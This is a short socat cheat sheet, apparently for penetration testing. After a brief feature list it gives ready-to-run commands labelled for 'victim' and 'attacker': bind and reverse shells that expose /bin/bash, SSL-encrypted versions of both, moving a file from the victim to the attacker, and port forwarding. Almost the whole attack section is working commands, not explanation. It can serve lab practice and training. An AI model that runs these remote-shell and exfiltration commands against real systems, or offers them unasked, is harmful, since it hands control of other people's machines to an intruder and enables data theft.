Socat

Socat supports data communication in both directions between a sender and a receiver

This also supports transferring data between those two channels independently

Data channels used by socat can be in the form of,

• A file or An executable program

• File Descriptor ( 0 - STDIN , 1 - STDOUT , 2 - STDERR )

• Pipe

• Serial port communication of device

• Sockets ( RAW, TCP, UDP, IPv4, IPv6, UNIX)

• SSL Sockets ( Socket Data + SSL Encryption )

• CONNECT with Proxy

Socat is similar to Netcat, but it supports some additional features like,

• Multiple connections

• Usage of secure protocols ( OpenSSL , Sockets , VPN Tunnel , SCTP )

BIND SHELL

VICTIM

socat tcp4-listen:5555 exec:/bin/bash

ATTACKER

socat - tcp4-connect:192.168.116.129:5555

REVERSE SHELL

ATTACKER

socat tcp4-listen:5555 STDOUT

VICTIM

socat tcp-connect:192.168.116.128:5555 exec:/bin/bash

ENCRYPTED BIND SHELL

VICTIM

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
cat shell.key shell.crt > shell.pem
socat openssl-listen:5555,cert=shell.pem,verify=0,fork exec:/bin/bash

ATTACKER

socat - openssl:192.168.116.129:5555,verify=0

ENCRYPTED REVERSE SHELL

ATTACKER

openssl req -newkey rsa:2048 -nodes -keyout kali_shell.key -x509 -days 365 -out kali_shell.crt
cat kali_shell.key kali_shell.crt > kali_shell.pem
socat openssl-listen:5555,cert=kali_shell.pem,verify=0,fork STDOUT

VICTIM

socat openssl:192.168.116.128:5555,verify=0 exec:/bin/bash

FILE TRANSFER

ATTACKER

socat tcp-listen:5555,fork file:transfer_file.txt

VICTIM

socat tcp-connect:192.168.116.128:5555 file:data.txt,create

PORT FORWARDING

// Apache Server - Port 80
sudo socat tcp-listen:5555,reuseaddr,fork tcp:127.0.0.1:80 &

RUNNING ELF BINARIES IN SERVER

socat tcp-listen:5000,reuseaddr,fork exec:"./sample",pty,stderr